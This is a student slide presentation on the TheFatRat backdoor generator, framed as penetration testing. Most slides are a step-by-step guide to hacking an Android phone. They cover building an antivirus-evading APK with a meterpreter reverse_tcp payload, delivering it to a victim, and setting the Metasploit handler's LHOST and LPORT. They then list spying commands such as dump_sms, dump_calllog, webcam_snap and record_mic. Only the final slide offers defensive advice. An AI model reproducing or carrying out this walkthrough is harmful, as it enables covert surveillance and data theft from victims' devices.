The TheFatrat is an easy tool to generate backdoor’s with msfvenom (a part from metasploit framework) and easy post exploitation attack. This tool compiles a malware with popular payload and then the compiled malware can be execute on android, windows, Linux. The malware that created with this tool also have an ability to bypass most AV software protection. Bypassing the Anti- Virus or Security Software will allow for a metasploit session between the attacker and the target without Anti-Virus detecting the malicious payload and flagging a warning back to the user.

1. TheFatRat
Guide InCharge,
Mr.AjithGS
Presented By,
AjilSunny
MCA LE-S3
Roll No.:01

2. CONTENTS
 Introduction
• Kali Linux
• Penetration testing
 TheFatRat
• Introduction to TheFatRat
• Advantages & Disadvantages
 Steps to Hacking Android with TheFatRat
• Payload File Creation
• Sending payload Tothe Target
• Commands to exploits victim’s windows
 Conclusion
 References

3. INTRODUCTION ONKALI LINUX
• Debian-basedLinuxdistributionaimedat advanced
PenetrationTestingandSecurityAuditing.
• ReleaseDate:March13th, 2013.
• Security-focusedversionof Linuxthat offers a large number
of toolsto seekoutweaknessesandsecure your network.
• Kalicontainsseveraltools
• Informationsecurity tasks
• PenetrationTesting,Securityresearch
• ComputerForensicsandReverseEngineering

4. • Developers:Mati Aharoni,DevonKearnsand Raphael
Hertzogof offensive security.
• Open source
• 600penetrationtestingtools+ Applications
• Platforms- x86, x86-64, armel
• LatestRelease–Kali 2017.3–21stNovember,2017
• Easyupgrade tofutureversions

5. • Also called pentesting
• Testinga computer system/network /Webapplication to find
vulnerabilities.
Benefits:
• Intelligently managevulnerabilities
• Avoid thecost of networkdowntime
• Meet regulatory requirements
• Preservecorporate image and customerloyalty
Penetration Testing

6. MAIN TERMS
• EXPLOIT-a pieceof codewritten to take advantage of a
particular vulnerability inthe system.
• PAYLOAD-simplescriptsthat thehackersutilize to interact witha
hacked system.
• LHOST- TheIPaddressyouwantyourlistener to bind to.
• LPORT- Theport youwantyourlistenerto bind to.
• Meterpreter- advanced,dynamically extensiblepayload thatusesin
memorydll injection& extended overthen/w at runtime.

7. TheFatRat
• The FatRat a massive exploiting tool
• Easy tool to generate backdoor
• Create backdoor for android, windows and linux
• Author:EdoMaland
• Versions:1.9.6.

8. TheFatRat
• This tool compiles a malware with popular payload and then the
compiled malware can be execute on Android, Windows, Linux.
• The malware that created with this tool also have an ability to
bypass most AV software
• With the help of msfconsole we can access all files in the victim
device

9. Advantages
• Open source
• Frequently updated
• Easyto deploy userspecific exploit
Disadvantages
• Can crashyoursystemifnot used wisely
• Requiresdeep knowledge forexploitdevelopment

10. STEPSFORHACKINGANDROID DEVICE
STEP1: FatRat Downloading and installation
The Downloading process is simply git clone.
git clone https://github.com/Screetsec/TheFatRat.git

11. STEP 2: List the folder TheFatRat it contains a file fatrat. Then
Execute the fatrat
 #fatrat

12. STEP 3: Create a backdoor with msfvenom.

13. STEP 4: Select the SIGNED ANDROID>> FatRat.apk
Set the Host IP address and the port number.

14. STEP 5: Enter a base name for output file.
Then Select android/meterpreter/reverse_tcp

15. The payload apk is created, and it is located in
/root /Desktop/TheFatRat /backdoored /hack.apk

16. STEP 6: Install a Main Activity App on your
Android phone

17. STEP 7: Set the multi/handler
Payload Handleris a module thatprovidesallthefeaturesof
themetasploitpayload systemtoexploit.
• msf > useexploit/multi/handler
STEP 8: Set the payload
• msf exploit(multi/handler) > set payload
android/meterpreter/reverse_tcp

18. STEP 9: Set the Local Host
The IP address you want your listener to bind to
• msf exploit(handler) > set LHOST 192.168.43.136
STEP 10: Set the Local Port
• msf exploit(handler) > set LPORT 4444

19. We can now interact with the victim & perform different
commands.
STEP 9: enter the command ‘Exploit’

20. Commands to Exploits Android
Device
 webcam_snap - Take a snap shot.
 webcam_stream- Play a video stream.
 webcam_list - List the camera types in the device .
 check_root- The device is rooted or not.
 dump_calllog- View the call details.
 dump_sms –To retrieve messages from victim’s phone.
 set_audio_mode –Set the android device in silent to ringing
mode.
 send_sms –Send message from victim’s to another.
 record_mic-Record audio from victim’s phone using mic
 sysinfo-Retrieve OS version of victim’s phone

21. CONCLUSION
• Keep your Android up to date.
• Installing antivirus software on your Android device.
• Never permanently enable installing of Apps from “Unknown
sources “.
• Never take your phone to important meetings or anywhere you
don't want people listening.
The backdoor application when installed and turned on the system
allows attacker to read, write and modify data. Cautions are:

22. REFERENCE
• https://github.com/Screetsec/TheFatRat
• https://www.youtube.com/watch?v=yUuwnu-NUXE
• https://github.com/Screetsec/TheFatRat
• https://www.youtube.com/watch?v=7PMfPbrM0o4
• https://bestsecuritysearch.com/fat-rat-malware-generation-
utility/